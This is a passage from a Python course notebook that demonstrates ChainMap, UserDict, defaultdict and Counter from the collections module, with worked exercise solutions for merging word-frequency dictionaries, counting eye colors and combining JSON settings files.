d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)

In [19]:
d['z'] = 100

In [20]:
print(d)

ChainMap({'a': 1, 'b': 2, 'z': 100}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6})


As you can see the element `'z': 100` was added to the chain map. But what about the underlying dictionaries that make up the map?

In [21]:
print(d1)
print(d2)
print(d3)

{'a': 1, 'b': 2, 'z': 100}
{'c': 3, 'd': 4}
{'e': 5, 'f': 6}


When mutating a chain map, the **first** dictionary in the chain is used to handle the mutation - even updates:

Let's try to update `c`, which is in the second dictionary:

In [22]:
d['c'] = 300

In [23]:
print(d)

ChainMap({'a': 1, 'b': 2, 'z': 100, 'c': 300}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6})


As you can see the **first** dictionary in the chain was "updated" - since the key did not exist in that dictionary, the key with the "updated" value was added to it:

In [24]:
print(d1)
print(d2)
print(d3)

{'a': 1, 'b': 2, 'z': 100, 'c': 300}
{'c': 3, 'd': 4}
{'e': 5, 'f': 6}


As you can see, a **new** element `c` was created in the **first** dict in the chain. When we view it from the chain map perspective, it looks like `c` was updated because it was actually inserted in the first dict, so that key is encountered in that dict first, and hence that new value is used.

What about deleting an item?

In [25]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)

In [26]:
del d['a']

In [27]:
list(d.items())

[('d', 4), ('f', 6), ('b', 2), ('c', 3), ('e', 5)]

In [28]:
print(d1)
print(d2)
print(d3)

{'b': 2}
{'c': 3, 'd': 4}
{'e': 5, 'f': 6}


As you can see `a` was deleted from the first dict.

One important point when deleting keys: deleting a key does not guarantee that the key no longer exists in the chain! It could exist in one of the parents, and only the child is affected:

In [29]:
d1 = {'a': 1, 'b': 2}
d2 = {'a': 100}
d = ChainMap(d1, d2)

In [30]:
d['a']

1

In [31]:
del d['a']

In [32]:
d['a']

100

Since we can only mutate the **first** dict in the chain, trying to delete an item that is present in the chain, but not in the child will cause an exception:

In [33]:
del d['c']

KeyError: "Key not found in the first mapping: 'c'"
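If we really do want a key gone from the whole chain, we have to work with the underlying maps ourselves. The following is a minimal sketch, not part of `ChainMap` itself: `delete_from_chain` is a hypothetical helper, and it assumes every map in the chain is a plain dictionary (not a nested `ChainMap`):

```python
from collections import ChainMap

def delete_from_chain(chain, key):
    """Delete `key` from every underlying map that contains it (hypothetical helper)."""
    found = False
    for mapping in chain.maps:
        if key in mapping:
            del mapping[key]
            found = True
    if not found:
        raise KeyError(key)

d1 = {'a': 1, 'b': 2}
d2 = {'a': 100, 'c': 3}
d = ChainMap(d1, d2)

delete_from_chain(d, 'a')   # removed from both d1 and d2
delete_from_chain(d, 'c')   # only present in d2
print(d1, d2)               # {'b': 2} {}
print('a' in d, 'c' in d)   # False False
```

Keep in mind that this mutates dictionaries other than the first one, which is exactly what `ChainMap` avoids doing on its own.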

A `ChainMap` is built as a view on top of a sequence of mappings, and those maps are incorporated **by reference**.
This means that if an underlying map is mutated, then the `ChainMap` instance will **see** the change:

In [34]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)

In [35]:
list(d.items())

[('d', 4), ('c', 3), ('f', 6), ('b', 2), ('a', 1), ('e', 5)]

In [36]:
d3['g'] = 7

In [37]:
list(d.items())

[('d', 4), ('g', 7), ('c', 3), ('f', 6), ('b', 2), ('a', 1), ('e', 5)]

We can even chain ChainMaps.
For example, we can use this approach to "append" a new dictionary to a chain map, in essence creating a **new** chain map that contains the maps from the original chain map plus one or more additional maps:

In [38]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = ChainMap(d1, d2)

In [39]:
d3 = {'d':400, 'e': 5 }
d = ChainMap(d, d3)

In [40]:
print(d)

ChainMap(ChainMap({'a': 1, 'b': 2}, {'c': 3, 'd': 4}), {'d': 400, 'e': 5})


Of course, we could place `d3` in front:

In [41]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = ChainMap(d1, d2)

In [42]:
d3 = {'d':400, 'e': 5 }
d = ChainMap(d3, d)
print(d)

ChainMap({'d': 400, 'e': 5}, ChainMap({'a': 1, 'b': 2}, {'c': 3, 'd': 4}))


So the ordering of the maps in the chain matters!

Instead of adding an element to the beginning of the chain list using the technique above, we can also use the `new_child` method, which returns a new chain map with the new element added to the beginning of the list:

In [43]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = ChainMap(d1, d2)

In [44]:
d3 = {'d':400, 'e': 5 }
d = d.new_child(d3)
print(d)

ChainMap({'d': 400, 'e': 5}, {'a': 1, 'b': 2}, {'c': 3, 'd': 4})


And as you can see the key `d: 400` is in our chain map.

There is also a property that can be used to return every map in the chain **except** the first map:

In [45]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)
print(d)

ChainMap({'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6})


In [46]:
d = d.parents
print(d)

ChainMap({'c': 3, 'd': 4}, {'e': 5, 'f': 6})
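Taken together, `new_child` and `parents` behave a bit like pushing and popping a scope. Here is a small sketch of that idea; the variable names are made up for illustration, and it relies on the fact that `new_child()` called without an argument puts a new empty dictionary at the front of the chain:

```python
from collections import ChainMap

global_scope = ChainMap({'x': 1, 'y': 2})

# new_child() with no argument adds a new empty dict at the front
local_scope = global_scope.new_child()
local_scope['x'] = 100          # written to the new front dict only
print(local_scope['x'], local_scope['y'])   # 100 2

# parents drops the front map, giving back a view of the enclosing "scope"
outer = local_scope.parents
print(outer['x'])                              # 1
print(outer.maps[0] is global_scope.maps[0])   # True
```

Note that `parents` returns a new `ChainMap`, but the maps inside it are the same objects, not copies.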


The chain map's list of maps is accessible via the `maps` property:

In [47]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = ChainMap(d1, d2)

In [48]:
type(d.maps), d.maps

(list, [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}])

As you can see this is a list, and so we can actually manipulate it as we would any list:

In [49]:
d3 = {'e': 5, 'f': 6}
d.maps.append(d3)

In [50]:
d.maps

[{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6}]

We could equally well remove a map from the list entirely, insert one wherever we want, etc:

In [51]:
d.maps.insert(0, {'a': 100})

In [52]:
d.maps

[{'a': 100}, {'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6}]

In [53]:
print(list(d.items()))

[('d', 4), ('c', 3), ('f', 6), ('b', 2), ('a', 100), ('e', 5)]


As you can see `a` now has a value of `100` in the chain map.

We can also delete a map from the chain entirely:

In [54]:
del d.maps[1]

In [55]:
d.maps

[{'a': 100}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6}]

##### Example

A typical application of a chain map, apart from "merging" multiple dictionaries without incurring extra overhead copying the data, is to create a mutable version of merged dictionaries that does not mutate the underlying dictionaries.

Remember that mutating elements of a chain map mutates the elements of the first map in the list only.

Let's say we have a dictionary with some settings and we want to temporarily modify these settings, but without modifying the original dictionary.

We could certainly copy the dictionary and work with the copy, discarding the copy when we no longer need it - but again this incurs some overhead copying all the data.

Instead we can use a chain map this way, by making the first dictionary in the chain a new empty dictionary - any updates we make will be made to that dictionary only, thereby preserving the other dictionaries.

In [56]:
config = {
    'host': 'prod.deepdive.com',
    'port': 5432,
    'database': 'deepdive',
    'user_id': '$pg_user',
    'user_pwd': '$pg_pwd'
}

In [57]:
local_config = ChainMap({}, config)

In [58]:
list(local_config.items())

[('user_pwd', '$pg_pwd'),
 ('database', 'deepdive'),
 ('port', 5432),
 ('user_id', '$pg_user'),
 ('host', 'prod.deepdive.com')]

And we can make changes to `local_config`:

In [59]:
local_config['user_id'] = 'test'
local_config['user_pwd'] = 'test'

In [60]:
list(local_config.items())

[('host', 'prod.deepdive.com'),
 ('database', 'deepdive'),
 ('port', 5432),
 ('user_id', 'test'),
 ('user_pwd', 'test')]

But notice that our original dictionary is unaffected:

In [61]:
list(config.items())

[('host', 'prod.deepdive.com'),
 ('port', 5432),
 ('database', 'deepdive'),
 ('user_id', '$pg_user'),
 ('user_pwd', '$pg_pwd')]

That's because the changes we made were reflected in the **first** dictionary in the chain - that empty dictionary:

In [62]:
local_config.maps

[{'user_id': 'test', 'user_pwd': 'test'},
 {'host': 'prod.deepdive.com',
  'port': 5432,
  'database': 'deepdive',
  'user_id': '$pg_user',
  'user_pwd': '$pg_pwd'}]
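Since all the temporary changes live in that first dictionary, discarding them is just a matter of emptying it. A minimal sketch, using a shortened version of the settings above and an extra `debug` key added purely for illustration:

```python
from collections import ChainMap

config = {'host': 'prod.deepdive.com', 'port': 5432}
local_config = ChainMap({}, config)

local_config['port'] = 5433
local_config['debug'] = True      # hypothetical extra setting

# the overrides live only in the first map
overrides = local_config.maps[0]
print(overrides)                  # {'port': 5433, 'debug': True}

# clearing the first map "resets" the chain map to the original settings
overrides.clear()
print(dict(local_config) == config)   # True
```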

##  UserDict

Suppose we want to create our own dictionary type that only allows real numbers for the values, and always returns the values as truncated integers.

We can do this simplistically, without using inheritance, by simply using a "backing" dictionary and implementing our getter and setter methods:

In [1]:
from numbers import Real

class IntDict:
    def __init__(self):
        self._d = {}
        
    def __setitem__(self, key, value):
        if not isinstance(value, Real):
            raise ValueError('Value must be a real number.')
        self._d[key] = value
        
    def __getitem__(self, key):
        return int(self._d[key])

In [2]:
d = IntDict()

In [3]:
d['a'] = 10.5

In [4]:
d['a']

10

In [5]:
d['a'] = 3 + 2j

ValueError: Value must be a real number.

The problem with this approach is that we have lost all the other functionality associated with dictionaries - for example, we cannot use the `get` method, or the `update` method, view objects, etc.

The solution here is to use inheritance. (I will cover OOP and inheritance in detail in Part 4 of this series, but wanted to point a few things out now).

When we inherit from a parent class, we get the functionality of the parent class, and override what we need to override.

In this case, we're going to inherit from the `dict` class, and override the `__setitem__` and `__getitem__` methods.

In [6]:
class IntDict(dict):
    def __setitem__(self, key, value):
        if not isinstance(value, Real):
            raise ValueError('Value must be a real number.')
        super().__setitem__(key, value)
        
    def __getitem__(self, key):
        return int(super().__getitem__(key))        

In [7]:
d = IntDict()
d['a'] = 10.5

In [8]:
d['a']

10

In [9]:
d['b'] = 'python'

ValueError: Value must be a real number.

So this works, and we also have all the functionality of dictionaries available to us as well - the only thing that is different is that we have created overrides for `__setitem__` and `__getitem__`.

In [10]:
d['b'] = 100.5

In [11]:
d.keys()

dict_keys(['a', 'b'])

We even get the `get` method:

In [12]:
d.get('x', 'N/A')

'N/A'

In [13]:
d.get('a')

10.5

Hmmm... Why did we not get `10` back? We did override the `__getitem__` method after all...

Same problem with the `update` method:

In [14]:
d1 = {}
d1.update(d)

In [15]:
d1

{'a': 10.5, 'b': 100.5}

OK, so that does not work either.
What about merging another dictionary into our custom dictionary? Will that at least honor the override we put in place for the `__setitem__` method?

In [16]:
d.update({'x': 'python'})

In [17]:
d

ValueError: invalid literal for int() with base 10: 'python'

Nope... So using the getter and setter directly seems to work, but it looks like many other methods in the dictionary class that get and set values are not actually calling our `__getitem__` and `__setitem__` methods.

The problem is inheriting from these **built-in** types. They do not necessarily use the `__xxx__` methods that we use in our user defined types. For example, when we call `len('abc')`, it does not actually call the `__len__` method that exists in the string class. These special methods are used in our custom classes, but there's absolutely no guarantee that they get used by the built-ins.

And in fact that's exactly what's happening here - the `update` and `get` methods are not using the `__getitem__` method - if they were, our overrides would be called instead - but obviously they are not.
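One way to see this for ourselves is to record every call to our overrides. The `LoudDict` class below is only an illustration (it is not from the standard library), and the behavior shown is what we observe in CPython:

```python
class LoudDict(dict):
    """dict subclass that records every call to our overrides (illustration only)."""
    def __init__(self, *args, **kwargs):
        self.calls = []
        super().__init__(*args, **kwargs)

    def __getitem__(self, key):
        self.calls.append(('get', key))
        return super().__getitem__(key)

    def __setitem__(self, key, value):
        self.calls.append(('set', key))
        super().__setitem__(key, value)

d = LoudDict(a=1)        # the dict initializer does not call our __setitem__
d.update(b=2)            # neither does update
d.get('a')               # get does not call our __getitem__
d.setdefault('c', 3)     # setdefault bypasses both
calls_before = list(d.calls)
print(calls_before)      # []

d['z'] = 26              # the [] syntax does go through the overrides
d['z']
print(d.calls)           # [('set', 'z'), ('get', 'z')]
```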

So, inheriting from `dict` works just fine, except when it doesn't!!!

Fortunately, this is where the `UserDict` can help us.

Provided as part of the standard library (in the `collections` module) it allows us to create custom dictionary objects and enjoy the normal inheritance behavior we would expect from non built-in types.

Let's try it out with our example:

In [18]:
from collections import UserDict

In [19]:
help(UserDict)

Help on class UserDict in module collections:

class UserDict(collections.abc.MutableMapping)
 |  Method resolution order:
 |      UserDict
 |      collections.abc.MutableMapping
 |      collections.abc.Mapping
 |      collections.abc.Collection
 |      collections.abc.Sized
 |      collections.abc.Iterable
 |      collections.abc.Container
 |      builtins.object
 |  
 |  Methods defined here:
 |  
 |  __contains__(self, key)
 |      # Modify __contains__ to work correctly when __missing__ is present
 |  
 |  __delitem__(self, key)
 |  
 |  __getitem__(self, key)
 |  
 |  __init__(*args, **kwargs)
 |      Initialize self.  See help(type(self)) for accurate signature.
 |  
 |  __iter__(self)
 |  
 |  __len__(self)
 |  
 |  __repr__(self)
 |      Return repr(self).
 |  
 |  __setitem__(self, key, item)
 |  
 |  copy(self)
 |  
 |  ----------------------------------------------------------------------
 |  Class methods defined here:
 |  
 |  fromkeys(iterable, value=None) from abc.ABCMet

As you can see, the methods we would expect from regular `dicts` seem to be present in the `UserDict` class. 
Let's build a custom dictionary type using it:

In [20]:
class IntDict(UserDict):
    def __setitem__(self, key, value):
        if not isinstance(value, Real):
            raise ValueError('Value must be a real number.')
        super().__setitem__(key, value)
        
    def __getitem__(self, key):
        return int(super().__getitem__(key))        

In [21]:
d = IntDict()

In [22]:
d['a'] = 10.5
d['b'] = 100.5

In [23]:
d['c'] = 'python'

ValueError: Value must be a real number.

In [24]:
d.get('a')

10

Nice! The `get` method called our override method.
What about the `update` method?

In [25]:
d1 = {}
d1.update(d)

In [26]:
d1

{'a': 10, 'b': 100}

Yes! That worked too.

Moreover, we can recover the underlying `dict` object from the `UserDict` objects:

In [27]:
d.data

{'a': 10.5, 'b': 100.5}

In [28]:
isinstance(d.data, dict)

True

In fact, we can also use the initializer that `UserDict` provides us:

In [29]:
d2 = IntDict(a=10)
d2

{'a': 10}

In [30]:
d1 = IntDict({'a': 1.1, 'b': 2.2, 'c': 3.3})

In [31]:
d1

{'a': 1.1, 'b': 2.2, 'c': 3.3}

You'll notice that the representation here lists the original values - that is correct, since to recreate the exact object we would need to use these values, not the truncated integers returned by `__getitem__`.

However, if we retrieve the items:

In [32]:
d1['a'], d1['b'], d1['c']

(1, 2, 3)

What if we try to create an instance with an incorrect value type:

In [33]:
d2 = IntDict({'a': 'python'})

ValueError: Value must be a real number.

That works too - so even the initializer is using our overridden `__setitem__` method.

In fact, this even works if we try merging another dictionary into our custom integer dictionary:

In [34]:
d1

{'a': 1.1, 'b': 2.2, 'c': 3.3}

In [35]:
d1.update({'a': 'python'})

ValueError: Value must be a real number.

So as you can see, subclassing `UserDict` is preferable to subclassing `dict` - the inheritance behaves more like we would expect with inheritance of user defined classes. The bottom line is that the built-ins are written in C, and make no guarantee as to whether they use these special methods at all.
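The same holds for other methods that `UserDict` inherits from `MutableMapping`, such as `setdefault` and `pop`. A quick sketch, repeating the `IntDict` class so the snippet runs on its own:

```python
from collections import UserDict
from numbers import Real

class IntDict(UserDict):
    def __setitem__(self, key, value):
        if not isinstance(value, Real):
            raise ValueError('Value must be a real number.')
        super().__setitem__(key, value)

    def __getitem__(self, key):
        return int(super().__getitem__(key))

d = IntDict(a=10.5)

existing = d.setdefault('a', 0)   # existing key: read through our __getitem__
print(existing)                   # 10
popped = d.pop('a')               # pop also reads through our __getitem__
print(popped)                     # 10

try:
    d.setdefault('b', 'python')   # missing key: stored through our __setitem__
except ValueError as ex:
    print(ex)                     # Value must be a real number.
```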

#### Example

Let's suppose we want to write a custom dictionary where keys can only be from a limited specified set of keys, and the values must be integers from 0-255.

We can attempt to do this in a more general form as follows:

In [36]:
class LimitedDict(UserDict):
    def __init__(self, keyset, min_value, max_value, *args, **kwargs):
        self._keyset = keyset
        self._min_value = min_value
        self._max_value = max_value
        super().__init__(*args, **kwargs)
        
    def __setitem__(self, key, value):
        if key not in self._keyset:
            raise KeyError('Invalid key name.')
        if not isinstance(value, int):
            raise ValueError('Value must be an integer type.')
        if value < self._min_value or value > self._max_value:
            raise ValueError(f'Value must be between {self._min_value} and {self._max_value}')
        super().__setitem__(key, value)

In [37]:
d = LimitedDict({'red', 'green', 'blue'}, 0, 255, red=10, green=10, blue=10)

In [38]:
d

{'red': 10, 'green': 10, 'blue': 10}

In [39]:
d['red'] = 200

In [40]:
d

{'red': 200, 'green': 10, 'blue': 10}

In [41]:
d['purple'] = 100

KeyError: 'Invalid key name.'

and, similarly, the values are bounded:

In [42]:
d['red'] = 300

ValueError: Value must be between 0 and 255
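Because `UserDict` routes its initializer and `update` through `__setitem__`, the same validation applies there too. The sketch below repeats the class so it runs on its own; the `errors` list is just a convenience added here to collect the exception names:

```python
from collections import UserDict

class LimitedDict(UserDict):
    def __init__(self, keyset, min_value, max_value, *args, **kwargs):
        # these must be set before super().__init__, which calls __setitem__
        self._keyset = keyset
        self._min_value = min_value
        self._max_value = max_value
        super().__init__(*args, **kwargs)

    def __setitem__(self, key, value):
        if key not in self._keyset:
            raise KeyError('Invalid key name.')
        if not isinstance(value, int):
            raise ValueError('Value must be an integer type.')
        if value < self._min_value or value > self._max_value:
            raise ValueError(f'Value must be between {self._min_value} and {self._max_value}')
        super().__setitem__(key, value)

colors = {'red', 'green', 'blue'}
errors = []

try:
    LimitedDict(colors, 0, 255, red=300)       # out of range in the initializer
except ValueError as ex:
    errors.append(type(ex).__name__)

d = LimitedDict(colors, 0, 255, red=10)
try:
    d.update(purple=1)                          # invalid key via update
except KeyError as ex:
    errors.append(type(ex).__name__)

print(errors)    # ['ValueError', 'KeyError']
print(d)         # {'red': 10}
```

This is also why the three private attributes are assigned **before** the call to `super().__init__` - the validation in `__setitem__` needs them while the initial items are being stored.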

# Section 10 - Coding Exercises

##  Exercise 1 - Solution

Let's revisit an exercise we did right after the section on dictionaries.

You have text data spread across multiple servers. Each server is able to analyze this data and return a dictionary that contains words and their frequency.

Your job is to combine this data to create a single dictionary that contains all the words and their combined frequencies from all these data sources. Bonus points if you can make your dictionary sorted by frequency (highest to lowest).

For example, you may have three servers that each return these dictionaries:

In [1]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

Your resulting dictionary should look like this:

In [2]:
d = {'python': 17,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10,
     'go': 9,
     'erlang': 5,
     'haskell': 2,
     'pascal': 1}

If only servers 1 and 2 return data (so d1 and d2), your results would look like:

In [3]:
d = {'python': 16,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10, 
     'go': 9}

This was one solution to the problem:

In [4]:
def merge(*dicts):
    unsorted = {}
    for d in dicts:
        for k, v in d.items():
            unsorted[k] = unsorted.get(k, 0) + v
            
    # create a dictionary sorted by value
    return dict(sorted(unsorted.items(), key=lambda e: e[1], reverse=True))

Implement two different solutions to this problem:

**a**: Using `defaultdict` objects

**b**: Using `Counter` objects

##### Solution a

Using `defaultdict` objects does not greatly simplify the problem, but at least we can get rid of the `get` logic:

In [5]:
from collections import defaultdict

def merge(*dicts):
    unsorted = defaultdict(int)
    for d in dicts:
        for k, v in d.items():
            unsorted[k] += v
            
    # create a dictionary sorted by value
    return dict(sorted(unsorted.items(), key=lambda e: e[1], reverse=True))

In [6]:
merge(d1, d2)

{'python': 16, 'javascript': 15, 'java': 13, 'c#': 12, 'c++': 10, 'go': 9}

In [7]:
merge(d1, d2, d3)

{'python': 17,
 'javascript': 15,
 'java': 13,
 'c#': 12,
 'c++': 10,
 'go': 9,
 'erlang': 5,
 'haskell': 2,
 'pascal': 1}

##### Solution b

Now that we know about the `Counter` class however, this problem is trivial:

In [8]:
from collections import Counter

def merge(*dicts):
    unsorted = Counter()
    for d in dicts:
        unsorted.update(d)
    
    return unsorted

In [9]:
print(merge(d1, d2))

Counter({'python': 16, 'javascript': 15, 'java': 13, 'c#': 12, 'c++': 10, 'go': 9})


In [10]:
print(merge(d1, d2, d3))

Counter({'python': 17, 'javascript': 15, 'java': 13, 'c#': 12, 'c++': 10, 'go': 9, 'erlang': 5, 'haskell': 2, 'pascal': 1})


Now, the only thing still missing is the fact that even though the counters may sometimes (pure luck!) appear sorted, they are not guaranteed to be so. For example, let's add `d4` as follows:

In [11]:
d4 = {'modula-2': 100}

In [12]:
merge(d1, d2, d3, d4)

Counter({'python': 17,
         'java': 13,
         'c#': 12,
         'javascript': 15,
         'c++': 10,
         'go': 9,
         'erlang': 5,
         'haskell': 2,
         'pascal': 1,
         'modula-2': 100})

As you can see, this is not sorted by frequency.

We could use the same technique we used before to sort the dictionary, but here I just want to show you an alternative.

The `Counter` objects have a method called `most_common`. We can use that method, without an argument, to return all the frequencies sorted from highest to lowest:

In [13]:
result = merge(d1, d2, d3, d4)

In [14]:
result.most_common()

[('modula-2', 100),
 ('python', 17),
 ('javascript', 15),
 ('java', 13),
 ('c#', 12),
 ('c++', 10),
 ('go', 9),
 ('erlang', 5),
 ('haskell', 2),
 ('pascal', 1)]

The only thing left is to turn this into a dictionary:

In [15]:
dict(result.most_common())

{'modula-2': 100,
 'python': 17,
 'javascript': 15,
 'java': 13,
 'c#': 12,
 'c++': 10,
 'go': 9,
 'erlang': 5,
 'haskell': 2,
 'pascal': 1}

So, let's finalize our function:

In [16]:
from collections import Counter

def merge(*dicts):
    result = Counter()
    for d in dicts:
        result.update(d)
    
    return dict(result.most_common())

In [17]:
merge(d1, d2, d3, d4)

{'modula-2': 100,
 'python': 17,
 'javascript': 15,
 'java': 13,
 'c#': 12,
 'c++': 10,
 'go': 9,
 'erlang': 5,
 'haskell': 2,
 'pascal': 1}
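As a possible variation (not the approach used above), we can also add `Counter` objects together with `sum`, using an empty `Counter` as the starting value. One caveat to be aware of: adding counters drops any key whose resulting count is zero or negative, which is fine for word frequencies but may not be what we want in general.

```python
from collections import Counter

def merge(*dicts):
    # Counter + Counter adds counts key by key; Counter() is the start value for sum
    total = sum((Counter(d) for d in dicts), Counter())
    return dict(total.most_common())

d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}

result = merge(d1, d2)
print(result)
# {'python': 16, 'javascript': 15, 'java': 13, 'c#': 12, 'c++': 10, 'go': 9}
```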

##  Exercise 2 - Solution

Suppose you have a list of all possible eye colors:

In [1]:
eye_colors = ("amber", "blue", "brown", "gray", "green", "hazel", "red", "violet")

Some other collection (say recovered from a database, or an external API) contains a list of `Person` objects that have an eye color property.

Your goal is to create a dictionary that contains the number of people that have the eye color as specified in `eye_colors`. The wrinkle here is that even if no one matches some eye color, say `amber`, your dictionary should still contain an entry `"amber": 0`.

Here is some sample data:

In [2]:
class Person:
    def __init__(self, eye_color):
        self.eye_color = eye_color

In [3]:
from random import seed, choices
seed(0)
persons = [Person(color) for color in choices(eye_colors[2:], k = 50)]

As you can see we built up a list of `Person` objects, none of which should have `amber` or `blue` eye colors.

Write a function that returns a dictionary with the correct counts for each eye color listed in `eye_colors`.

We're going to use the `Counter` class for this problem.
However, simply counting the eye colors in the `persons` list is not going to be quite enough:

In [4]:
from collections import Counter

In [5]:
counts = Counter(p.eye_color for p in persons)

In [6]:
counts

Counter({'violet': 12,
         'red': 10,
         'green': 8,
         'gray': 10,
         'hazel': 7,
         'brown': 3})

As you can see we do not have entries for `amber` and `blue` for example.

We could approach this in one of two ways:
1. add zero count key/value pairs after the counting has occurred
2. or, pre-initialize the `Counter` object with all the possible eye colors set to a count of `0`.

Let's try the first approach:

In [7]:
counts = Counter(p.eye_color for p in persons)

In [8]:
result = {color: counts.get(color, 0) for color in eye_colors}

In [9]:
result

{'amber': 0,
 'blue': 0,
 'brown': 3,
 'gray': 10,
 'green': 8,
 'hazel': 7,
 'red': 10,
 'violet': 12}

And now the second approach, where we initialize our Counter object with zero counts for each eye color first, and **then** do the counting:

In [10]:
counts = Counter({color: 0 for color in eye_colors})

In [11]:
counts

Counter({'amber': 0,
         'blue': 0,
         'brown': 0,
         'gray': 0,
         'green': 0,
         'hazel': 0,
         'red': 0,
         'violet': 0})

As you can see we have each color with a count of zero - now we simply update the counter based on the results in the `persons` list:

In [12]:
counts.update(p.eye_color for p in persons)

In [13]:
counts

Counter({'amber': 0,
         'blue': 0,
         'brown': 3,
         'gray': 10,
         'green': 8,
         'hazel': 7,
         'red': 10,
         'violet': 12})

Finally, let's package up one of those solutions into a function:

In [14]:
def count_eye_colors(persons, possible_eye_colors):
    counts = Counter({color: 0 for color in possible_eye_colors})
    counts.update(p.eye_color for p in persons)
    return counts

which we can then call like this:

In [15]:
count_eye_colors(persons, eye_colors)

Counter({'amber': 0,
         'blue': 0,
         'brown': 3,
         'gray': 10,
         'green': 8,
         'hazel': 7,
         'red': 10,
         'violet': 12})
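The function above returns a `Counter`, and it would also count any eye color that is not in the list of possible colors. If we want a plain dictionary restricted to the known colors, the first approach can be packaged up instead. This is just a sketch: the function name `count_eye_colors_dict` and the tiny sample list (including the invalid color `pink`) are made up for illustration.

```python
from collections import Counter

class Person:
    def __init__(self, eye_color):
        self.eye_color = eye_color

def count_eye_colors_dict(persons, possible_eye_colors):
    counts = Counter(p.eye_color for p in persons)
    # a Counter returns 0 for missing keys, so counts[color] is safe here
    return {color: counts[color] for color in possible_eye_colors}

people = [Person('brown'), Person('green'), Person('brown'), Person('pink')]
result = count_eye_colors_dict(people, ('amber', 'brown', 'green'))
print(result)
# {'amber': 0, 'brown': 2, 'green': 1}
```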

##  Exercises

#### Exercise #1

Let's revisit an exercise we did right after the section on dictionaries.

You have text data spread across multiple servers. Each server is able to analyze this data and return a dictionary that contains words and their frequency.

Your job is to combine this data to create a single dictionary that contains all the words and their combined frequencies from all these data sources. Bonus points if you can make your dictionary sorted by frequency (highest to lowest).

For example, you may have three servers that each return these dictionaries:

In [1]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

Your resulting dictionary should look like this:

In [2]:
d = {'python': 17,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10,
     'go': 9,
     'erlang': 5,
     'haskell': 2,
     'pascal': 1}

If only servers 1 and 2 return data (so d1 and d2), your results would look like:

In [3]:
d = {'python': 16,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10, 
     'go': 9}

This was one solution to the problem:

In [4]:
def merge(*dicts):
    unsorted = {}
    for d in dicts:
        for k, v in d.items():
            unsorted[k] = unsorted.get(k, 0) + v
            
    # create a dictionary sorted by value
    return dict(sorted(unsorted.items(), key=lambda e: e[1], reverse=True))

Implement two different solutions to this problem:

**a**: Using `defaultdict` objects

**b**: Using `Counter` objects

---

#### Exercise #2

Suppose you have a list of all possible eye colors:

In [5]:
eye_colors = ("amber", "blue", "brown", "gray", "green", "hazel", "red", "violet")

Some other collection (say recovered from a database, or an external API) contains a list of `Person` objects that have an eye color property.

Your goal is to create a dictionary that contains the number of people that have the eye color as specified in `eye_colors`. The wrinkle here is that even if no one matches some eye color, say `amber`, your dictionary should still contain an entry `"amber": 0`.

Here is some sample data:

In [6]:
class Person:
    def __init__(self, eye_color):
        self.eye_color = eye_color

In [7]:
from random import seed, choices
seed(0)
persons = [Person(color) for color in choices(eye_colors[2:], k = 50)]

As you can see we built up a list of `Person` objects, none of which should have `amber` or `blue` eye colors.

Write a function that returns a dictionary with the correct counts for each eye color listed in `eye_colors`.

---

#### Exercise #3

You are given three JSON files, representing a default set of settings, and environment specific settings.
The files are included in the downloads, and are named:
* `common.json`
* `dev.json`
* `prod.json`

Your goal is to write a function that has a single argument (the environment name) and returns the "combined" dictionary that merges the two dictionaries together, with the environment specific settings overriding any common settings already defined.

For simplicity, assume that the argument values are going to be the same as the file names, without the `.json` extension. So for example, `dev` or `prod`.

The wrinkle: We don't want to duplicate data for the "merged" dictionary - use `ChainMap` to implement this instead.

##  Exercise 3 - Solution

You are given three JSON files, representing a default set of settings, and environment specific settings.
The files are included in the downloads, and are named:
* `common.json`
* `dev.json`
* `prod.json`

Your goal is to write a function that has a single argument, the environment name, and returns the "combined" dictionary that merges the two dictionaries together, with the environment specific settings overriding any common settings already defined.

For simplicity, assume that the argument values are going to be the same as the file names, without the `.json` extension. So for example, `dev` or `prod`.

The wrinkle: We don't want to duplicate data for the "merged" dictionary - use `ChainMap` to implement this instead.

The first thing we'll need to do is write a function to load the JSON files:

In [1]:
import json

def load_settings(env):
    # assume file name is <env>.json
    with open(f'{env}.json') as f:
        settings = json.load(f)
    return settings

In [2]:
from pprint import pprint

In [3]:
pprint(load_settings('common'))

{'data': {'input_root': '/default/path/inputs',
          'numerics': {'precision': 6, 'type': 'Decimal'},
          'output_root': '/default/path/outputs'},
 'database': {'db_name': 'deepdive', 'port': 5432, 'schema': 'public'},
